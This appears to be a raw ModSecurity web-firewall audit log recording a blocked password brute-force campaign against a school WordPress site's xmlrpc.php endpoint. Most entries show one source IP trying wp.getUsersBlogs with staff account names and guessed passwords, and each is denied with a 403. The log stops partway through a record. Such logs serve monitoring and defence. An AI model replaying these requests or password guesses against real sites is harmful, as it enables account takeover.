[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285521287092 4842 (- - -) Stopwatch2: 1749285521287092 4842; combined=3788, p1=446, p2=3173, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbbaef72-Z-- --83dff571-A-- [07/Jun/2025:15:39:41 +0700] aEP6zWCOO9DrcKL2J_78ewAAAMo 103.236.140.4 48562 103.236.140.4 8181 --83dff571-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --83dff571-C-- wp.getUsersBlogs wakasarpras x4ivygA51F --83dff571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83dff571-E-- --83dff571-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285581354786 4841 (- - -) Stopwatch2: 1749285581354786 4841; combined=3870, p1=448, p2=3134, p3=0, p4=0, p5=159, sr=84, sw=129, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83dff571-Z-- --4db56304-A-- [07/Jun/2025:15:40:41 +0700] aEP7CRK9gc79coX6mHSN_AAAAEA 103.236.140.4 50186 103.236.140.4 8181 --4db56304-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4db56304-C-- wp.getUsersBlogs wakasarpras sparky --4db56304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db56304-E-- --4db56304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285641183309 5583 (- - -) Stopwatch2: 1749285641183309 5583; combined=4195, p1=511, p2=3509, p3=0, p4=0, p5=104, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db56304-Z-- --0a311a1b-A-- [07/Jun/2025:15:41:42 +0700] aEP7RvClubEPOra_8UkN1wAAABE 103.236.140.4 52060 103.236.140.4 8181 --0a311a1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0a311a1b-C-- wp.getUsersBlogs wakasarpras sunshine1 --0a311a1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a311a1b-E-- --0a311a1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285702192117 5465 (- - -) Stopwatch2: 1749285702192117 5465; combined=3838, p1=484, p2=3182, p3=0, p4=0, p5=101, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a311a1b-Z-- --4ca2b706-A-- [07/Jun/2025:15:42:42 +0700] aEP7gmCOO9DrcKL2J_79-gAAAMQ 103.236.140.4 53626 103.236.140.4 8181 --4ca2b706-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4ca2b706-C-- wp.getUsersBlogs wakasarpras manager --4ca2b706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ca2b706-E-- --4ca2b706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285762220833 5186 (- - -) Stopwatch2: 1749285762220833 5186; combined=3715, p1=462, p2=3084, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ca2b706-Z-- --f3599d3e-A-- [07/Jun/2025:15:43:42 +0700] aEP7vpANhDjQAvBdMyHfxgAAAII 103.236.140.4 55492 103.236.140.4 8181 --f3599d3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f3599d3e-C-- wp.getUsersBlogs wakasarpras tottenham --f3599d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3599d3e-E-- --f3599d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285822077747 5401 (- - -) Stopwatch2: 1749285822077747 5401; combined=3867, p1=468, p2=3217, p3=0, p4=0, p5=108, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3599d3e-Z-- --bdc3b924-A-- [07/Jun/2025:15:44:42 +0700] aEP7-pANhDjQAvBdMyHgPgAAAIg 103.236.140.4 57498 103.236.140.4 8181 --bdc3b924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bdc3b924-C-- wp.getUsersBlogs wakasarpras smkn22-jkt-sch-id@ --bdc3b924-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdc3b924-E-- --bdc3b924-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285882650249 5564 (- - -) Stopwatch2: 1749285882650249 5564; combined=4292, p1=493, p2=3604, p3=0, p4=0, p5=114, sr=89, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdc3b924-Z-- --e9480803-A-- [07/Jun/2025:15:45:42 +0700] aEP8NpANhDjQAvBdMyHgwgAAAIY 103.236.140.4 59536 103.236.140.4 8181 --e9480803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e9480803-C-- wp.getUsersBlogs wakasarpras 2010 --e9480803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9480803-E-- --e9480803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (96+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749285942321047 5325 (- - -) Stopwatch2: 1749285942321047 5325; combined=3606, p1=484, p2=2938, p3=0, p4=0, p5=107, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9480803-Z-- --b96b8a29-A-- [07/Jun/2025:15:46:42 +0700] aEP8cpANhDjQAvBdMyHhPgAAAII 103.236.140.4 33450 103.236.140.4 8181 --b96b8a29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b96b8a29-C-- wp.getUsersBlogs wakasarpras domain --b96b8a29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b96b8a29-E-- --b96b8a29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286002147244 5358 (- - -) Stopwatch2: 1749286002147244 5358; combined=4226, p1=491, p2=3543, p3=0, p4=0, p5=112, sr=89, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b96b8a29-Z-- --30417b79-A-- [07/Jun/2025:15:47:38 +0700] aEP8qhK9gc79coX6mHSR8gAAAFA 103.236.140.4 35582 103.236.140.4 8181 --30417b79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30417b79-C-- wp.getUsersBlogs wakasarpras 1234%^&* --30417b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30417b79-E-- --30417b79-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286058102813 5158 (- - -) Stopwatch2: 1749286058102813 5158; combined=3756, p1=452, p2=3122, p3=0, p4=0, p5=111, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30417b79-Z-- --e2529953-A-- [07/Jun/2025:15:47:42 +0700] aEP8rpANhDjQAvBdMyHiBQAAAIs 103.236.140.4 35752 103.236.140.4 8181 --e2529953-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e2529953-C-- wp.getUsersBlogs wakasarpras qqqqqq --e2529953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2529953-E-- --e2529953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286062312968 5913 (- - -) Stopwatch2: 1749286062312968 5913; combined=4371, p1=532, p2=3633, p3=0, p4=0, p5=122, sr=125, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2529953-Z-- --a8624c75-A-- [07/Jun/2025:15:48:42 +0700] aEP86hK9gc79coX6mHSSrgAAAE0 103.236.140.4 37918 103.236.140.4 8181 --a8624c75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8624c75-C-- wp.getUsersBlogs wakasarpras anthony --a8624c75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8624c75-E-- --a8624c75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286122136938 5532 (- - -) Stopwatch2: 1749286122136938 5532; combined=3895, p1=530, p2=3192, p3=0, p4=0, p5=102, sr=123, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8624c75-Z-- --43ba6c03-A-- [07/Jun/2025:15:49:46 +0700] aEP9KvClubEPOra_8UkSIgAAAAw 103.236.140.4 39782 103.236.140.4 8181 --43ba6c03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --43ba6c03-C-- wp.getUsersBlogs wakasarpras qqww1122 --43ba6c03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ba6c03-E-- --43ba6c03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286186906531 5683 (- - -) Stopwatch2: 1749286186906531 5683; combined=3970, p1=484, p2=3298, p3=0, p4=0, p5=109, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ba6c03-Z-- --40a24409-A-- [07/Jun/2025:15:50:48 +0700] aEP9aGCOO9DrcKL2J_4BpgAAANI 103.236.140.4 41218 103.236.140.4 8181 --40a24409-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --40a24409-C-- wp.getUsersBlogs kasubagtu smkn22-jkt.sch.id --40a24409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40a24409-E-- --40a24409-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286248103438 5611 (- - -) Stopwatch2: 1749286248103438 5611; combined=4348, p1=461, p2=3684, p3=0, p4=0, p5=117, sr=86, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40a24409-Z-- --12910b1d-A-- [07/Jun/2025:15:51:48 +0700] aEP9pGCOO9DrcKL2J_4CSQAAAMs 103.236.140.4 42918 103.236.140.4 8181 --12910b1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12910b1d-C-- wp.getUsersBlogs kasubagtu kasubagtupwd --12910b1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12910b1d-E-- --12910b1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286308395481 4685 (- - -) Stopwatch2: 1749286308395481 4685; combined=3329, p1=419, p2=2773, p3=0, p4=0, p5=80, sr=75, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12910b1d-Z-- --2e1a353e-A-- [07/Jun/2025:15:52:48 +0700] aEP94JANhDjQAvBdMyHkSgAAAI0 103.236.140.4 44380 103.236.140.4 8181 --2e1a353e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2e1a353e-C-- wp.getUsersBlogs kasubagtu Graphics123! --2e1a353e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e1a353e-E-- --2e1a353e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749286368112996 5762 (- - -) Stopwatch2: 1749286368112996 5762; combined=3987, p1=504, p2=3289, p3=0, p4=0, p5=117, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e1a353e-Z-- --5f738644-A-- [07/Jun/2025:15:53:48 +0700] aEP-HBK9gc79coX6mHSUdAAAAFA 103.236.140.4 45970 103.236.140.4 8181 --5f738644-B-- POST /xmlrpc.php HTTP/1.0 Host: 